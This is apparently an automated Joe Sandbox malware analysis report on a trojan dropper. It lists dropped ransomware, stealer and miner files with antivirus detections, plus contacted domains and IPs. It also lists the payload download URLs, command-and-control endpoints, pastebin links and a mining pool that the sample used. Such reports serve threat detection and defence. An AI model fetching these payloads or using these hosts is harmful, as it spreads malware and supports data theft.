                  C:\Users\user\AppData\Local\Temp\evs.exe82%ReversingLabsWin32.Ransomware.LockbitCrypt
                  C:\Users\user\AppData\Local\Temp\hello_C# (2).exe3%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\hello_C# (2).exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\hello_C#.exe3%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\hello_C#.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\jo.exe79%ReversingLabsWin32.Trojan.Glupteba
                  C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll3%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\revs.exe24%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\revs.exe90%ReversingLabsByteCode-MSIL.Trojan.ClipBanker
                  C:\Users\user\AppData\Local\lxoqz3o0.exe61%ReversingLabsWin32.Packed.Themida
                  C:\Users\user\AppData\Local\nulhfhsi.exe24%MetadefenderBrowse
                  C:\Users\user\AppData\Local\nulhfhsi.exe66%ReversingLabsWin32.Trojan.AgentTesla

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  25.0.revs.exe.400000.0.unpack100%AviraHEUR/AGEN.1133612Download File
                  22.0.evs.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                  31.3.jo.exe.860000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                  37.0.Chrome updater.exe.400000.0.unpack100%AviraHEUR/AGEN.1133612Download File
                  4.2.nulhfhsi.exe.4763110.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  4.0.nulhfhsi.exe.3b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  31.2.jo.exe.8b0000.2.unpack100%AviraHEUR/AGEN.1108168Download File
                  31.2.jo.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  31.2.jo.exe.850e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                  22.2.evs.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                  4.2.nulhfhsi.exe.38bd834.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  4.2.nulhfhsi.exe.3b0000.0.unpack100%AviraTR/Dropper.GenDownload File
                  4.1.nulhfhsi.exe.3b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  4.2.nulhfhsi.exe.38c513c.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                  Domains

                  SourceDetectionScannerLabelLink
                  blog.agencia10x.com11%VirustotalBrowse
                  api.ip.sb1%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange0%Avira URL Cloudsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://schemas.datacontract.org0%URL Reputationsafe
                  http://schemas.datacontract.org0%URL Reputationsafe
                  http://schemas.datacontract.org0%URL Reputationsafe
                  http://schemas.datacontract.org0%URL Reputationsafe
                  http://195.2.84.91/cpu.zip5%VirustotalBrowse
                  http://195.2.84.91/cpu.zip0%Avira URL Cloudsafe
                  http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums0%Avira URL Cloudsafe
                  http://87.251.71.75:321440%Avira URL Cloudsafe
                  https://blog.agencia10x.com/dance.exe100%Avira URL Cloudmalware
                  http://tempuri.org/0%Avira URL Cloudsafe
                  http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoip0%Avira URL Cloudsafe
                  http://87.251.71.75:3214/0%Avira URL Cloudsafe
                  https://d301sr5gafysq2.cloudfront.net;0%Avira URL Cloudsafe
                  http://tempuri.org/IRemotePanel/GetTasksResponse0%Avira URL Cloudsafe
                  http://tempuri.org/IRemotePanel/SendClientInfo0%Avira URL Cloudsafe
                  https://blog.agencia10x.com0%Avira URL Cloudsafe
                  https://sectigo.com/CPS0D0%URL Reputationsafe
                  https://sectigo.com/CPS0D0%URL Reputationsafe
                  https://sectigo.com/CPS0D0%URL Reputationsafe
                  http://tempuri.org/00%Avira URL Cloudsafe
                  http://195.2.84.91/nvidia.zip0%Avira URL Cloudsafe
                  http://tempuri.org/IRemotePanel/GetSettingsResponse0%Avira URL Cloudsafe
                  http://87.251.71.75:32140%Avira URL Cloudsafe
                  http://tempuri.org/IRemotePanel/SendClientInfoResponse0%Avira URL Cloudsafe
                  http://tempuri.org/IRemotePanel/GetTasks0%Avira URL Cloudsafe
                  https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy0%Avira URL Cloudsafe
                  http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                  http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                  http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                  https://blog.agencia10x.com/Done.exe0%Avira URL Cloudsafe
                  http://ocsp.thawte.com00%URL Reputationsafe
                  http://ocsp.thawte.com00%URL Reputationsafe
                  http://ocsp.thawte.com00%URL Reputationsafe
                  https://api.ip.sb0%Avira URL Cloudsafe
                  http://87.251.71.75:0%Avira URL Cloudsafe
                  http://87.251.71.75:3214t0%Avira URL Cloudsafe
                  http://checkip.dyndns.org0%Avira URL Cloudsafe
                  http://tempuri.org/IRemotePanel/CompleteTaskResponse0%Avira URL Cloudsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://195.2.84.91/amd.zip0%Avira URL Cloudsafe
                  https://blog.agencia10x.com40%Avira URL Cloudsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                  http://tempuri.org/IRemotePanel/Complete0%Avira URL Cloudsafe
                  https://blog.agencia10x.com/mex.exe100%Avira URL Cloudmalware
                  https://pastebin.com40%Avira URL Cloudsafe
                  http://tempuri.org/IRemotePanel/CompleteTask0%Avira URL Cloudsafe
                  http://tempuri.org/IRemotePanel/GetSettings0%Avira URL Cloudsafe
                  http://blog.agencia10x.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ianawhois.vip.icann.org
                  		192.0.47.59
                  		truefalse
                    		high
                    bitbucket.org
                    		104.192.141.1
                    		truefalse
                      		high
                      s3-1-w.amazonaws.com
                      		52.217.107.52
                      		truefalse
                        		high
                        blog.agencia10x.com
                        		104.21.67.51
                        		truetrueunknown
                        iplogger.org
                        		88.99.66.31
                        		truefalse
                          		high
                          WHOIS.RIPE.NET
                          		193.0.6.135
                          		truefalse
                            		high
                            pool.minexmr.com
                            		51.68.21.186
                            		truefalse
                              		high
                              pastebin.com
                              		104.23.99.190
                              		truefalse
                                		high
                                bbuseruploads.s3.amazonaws.com
                                		unknown
                                		unknownfalse
                                  		high
                                  api.ip.sb
                                  		unknown
                                  		unknowntrueunknown
                                  whois.iana.org
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://195.2.84.91/cpu.zipfalse
                                    • 5%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://87.251.71.75:3214/false
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabnulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                      		high
                                      https://icanhazip.comnulhfhsi.exefalse
                                        		high
                                        https://duckduckgo.com/ac/?q=nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchangenulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://iplogger.org/1r2et78TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmpfalse
                                            		high
                                            http://ocsp.sectigo.com08TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.datacontract.orgnulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-website;nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/soap/envelope/nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enumsnulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://87.251.71.75:32144nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/soap/envelope/Dnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://blog.agencia10x.com/dance.exe8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273251560.0000000003200000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://tempuri.org/nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipnulhfhsi.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://wtfismyip.com/textnulhfhsi.exefalse
                                                    		high
                                                    https://pastebin.com/raw/WmBNYXYN8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://api.ipify.orgnulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpfalse
                                                        		high
                                                        https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/e9515cd4-e4be-nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://d301sr5gafysq2.cloudfront.net;nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://tempuri.org/IRemotePanel/GetTasksResponsenulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://tempuri.org/IRemotePanel/SendClientInfonulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.471019323.0000000003A19000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exefalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://blog.agencia10x.com8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://sectigo.com/CPS0D8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://tempuri.org/0nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://bitbucket.orgnulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://bbuseruploads.s3.amazonaws.comnulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://195.2.84.91/nvidia.ziplxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://iplogger.org/1tsef7lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/IRemotePanel/GetSettingsResponsenulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://87.251.71.75:3214nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ipinfo.io/ip%appdata%nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpfalse
                                                                        		high
                                                                        https://iplogger.org/1n6Zw7powershell.exe, 00000020.00000002.502282965.0000000000B40000.00000004.00000020.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/IRemotePanel/SendClientInfoResponsenulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://bbuseruploads.s3.amazonaws.comnulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/IRemotePanel/GetTasksnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dynulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://schemas.datacontract.org/2004/07/nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://blog.agencia10x.com/Done.exenulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://bitbucket.orgnulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://ocsp.thawte.com0nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exefalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://api.ip.sbnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://87.251.71.75:nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://87.251.71.75:3214tnulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  http://checkip.dyndns.orgnulhfhsi.exefalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/IRemotePanel/CompleteTaskResponsenulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchnulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://nsis.sf.net/NSIS_ErrorErrornulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.drfalse
                                                                                      		high
                                                                                      https://iplogger.org/1n6Zw7C:o9Ppowershell.exe, 00000020.00000002.507518014.0000000000DD0000.00000004.00000040.sdmpfalse
                                                                                        		high
                                                                                        https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN&8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmpfalse
                                                                                          		high
                                                                                          https://iplogger.org8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://bot.whatismyipaddress.com/nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://ac.ecosia.org/autocomplete?q=nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://nsis.sf.net/NSIS_Errorevs.exe, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.drfalse
                                                                                                  		high
                                                                                                  http://s3-1-w.amazonaws.comnulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://195.2.84.91/amd.ziplxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://blog.agencia10x.com48TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://bitbucket.org/mminminminmin05/testtest/downloads/flesh.exenulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/IRemotePanel/Completenulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://blog.agencia10x.com/mex.exe8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmptrue
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        https://pastebin.com48TD8GfTtaW.exe, 00000000.00000002.273278567.0000000003208000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://tempuri.org/IRemotePanel/CompleteTasknulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468811238.0000000003805000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://tempuri.org/IRemotePanel/GetSettingsnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://duckduckgo.com/chrome_newtabtnulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://pastebin.com/raw/bnxCb5RP8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://aui-cdn.atlassian.comnulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://blog.agencia10x.com8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmptrue
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/soap/actor/nextnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                                                    		high

                                                                                                                    Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    104.21.67.51
                                                                                                                    		unknownUnited States
                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                    195.2.84.91
                                                                                                                    		unknownRussian Federation
                                                                                                                    		6903ZENON-ASMoscowRussiaRUfalse
                                                                                                                    172.67.213.210
                                                                                                                    		unknownUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    193.0.6.135
                                                                                                                    		unknownNetherlands
                                                                                                                    		3333RIPE-NCC-ASReseauxIPEuropeensNetworkCoordinationCentrefalse
                                                                                                                    52.217.107.52
                                                                                                                    		unknownUnited States
                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                    51.68.21.186
                                                                                                                    		unknownFrance
                                                                                                                    		16276OVHFRfalse
                                                                                                                    104.23.99.190
                                                                                                                    		unknownUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    104.192.141.1
                                                                                                                    		unknownUnited States
                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                    88.99.66.31
                                                                                                                    		unknownGermany
                                                                                                                    		24940HETZNER-ASDEfalse
                                                                                                                    87.251.71.75
                                                                                                                    		unknownRussian Federation
                                                                                                                    		49877RMINJINERINGRUfalse
                                                                                                                    192.0.47.59
                                                                                                                    		unknownUnited States
                                                                                                                    		16876ICANN-DCUSfalse

                                                                                                                    Private

                                                                                                                    IP
                                                                                                                    192.168.2.1

                                                                                                                    General Information

                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                    Analysis ID:356507
                                                                                                                    Start date:23.02.2021
                                                                                                                    Start time:09:10:10
                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                    Overall analysis duration:0h 17m 31s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:light
                                                                                                                    Sample file name:8TD8GfTtaW.exe
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                    Number of analysed new started processes analysed:38
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • HDC enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.adwa.spyw.evad.mine.winEXE@37/49@16/12
                                                                                                                    EGA Information:Failed
                                                                                                                    HDC Information:
                                                                                                                    • Successful, ratio: 26% (good quality ratio 25.3%)
                                                                                                                    • Quality average: 82.5%
                                                                                                                    • Quality standard deviation: 25.9%
                                                                                                                    HCA Information:Failed
                                                                                                                    Cookbook Comments:
                                                                                                                    • Adjust boot time
                                                                                                                    • Enable AMSI
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    Warnings:
                                                                                                                    Show All
                                                                                                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 104.43.193.48, 92.122.145.220, 104.42.151.234, 23.218.208.56, 2.20.142.210, 2.20.142.209, 51.103.5.186, 104.26.12.31, 172.67.75.172, 104.26.13.31, 88.221.62.148, 152.199.19.161
                                                                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ie9comview.vo.msecnd.net, updates.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, cs9.wpc.v0cdn.net
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

